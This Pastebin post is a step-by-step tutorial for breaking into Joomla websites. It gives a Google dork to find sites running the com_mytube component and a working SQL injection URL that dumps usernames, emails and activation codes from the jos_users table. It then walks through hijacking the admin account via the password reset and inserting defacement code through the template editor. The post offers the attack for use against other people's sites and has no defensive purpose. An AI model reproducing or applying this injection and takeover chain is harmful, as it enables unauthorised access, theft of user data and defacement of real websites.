Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- HOW TO HACK JOOMLA WEBSITES COMPLETE TUTORIAL
- There are different ways to hack a Joomla based website ...But today i am posting
- one of the finest way to hack Joomla websites....
- Tutorial to hack Joomla websites
- First Of all you input this
- Google Dork :
- inurl:"option=com_mytube"
- enter this dork in Google search box...
- Next is injecting the target
- See for this URL:
- http://site.com/index.php?option=com_mytube&Itemid=88...
- Now You have to replace the url like this:
- Code:
- http://site.com/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
- If the site is vulnerable, you can see the image like this shown below:
- We can see username, email and activation code. (username:email:activation code)
- Now, let this page open and open a new page.
- 3- Admin password reset
- Go to:
- http://www.site.com/index.php?option=com_user&view=reset
- This is standard Joomla! query for password reset request
- Type the email adress found in step 2 and press Submit.
- The activation code should be resetted.
- Return to the first page, refresh the page and take the new activation code.
- Paste him in the token and press Submit.
- problem with token.. :((
- UPDATE: Joomla! 1.5.16 now hashes the reset token
- if you see a thing like :$1$14411: after the activation code, it will not work
- 4- Admin Login
- If you done everything ok, your Password page will load. Enter your new password...
- After that go to:
- http://www.site.com/administrator/
- Standard Joomla portal content management system
- Enter the username (found in step 2) and your new password, click on Login
- Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
- In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement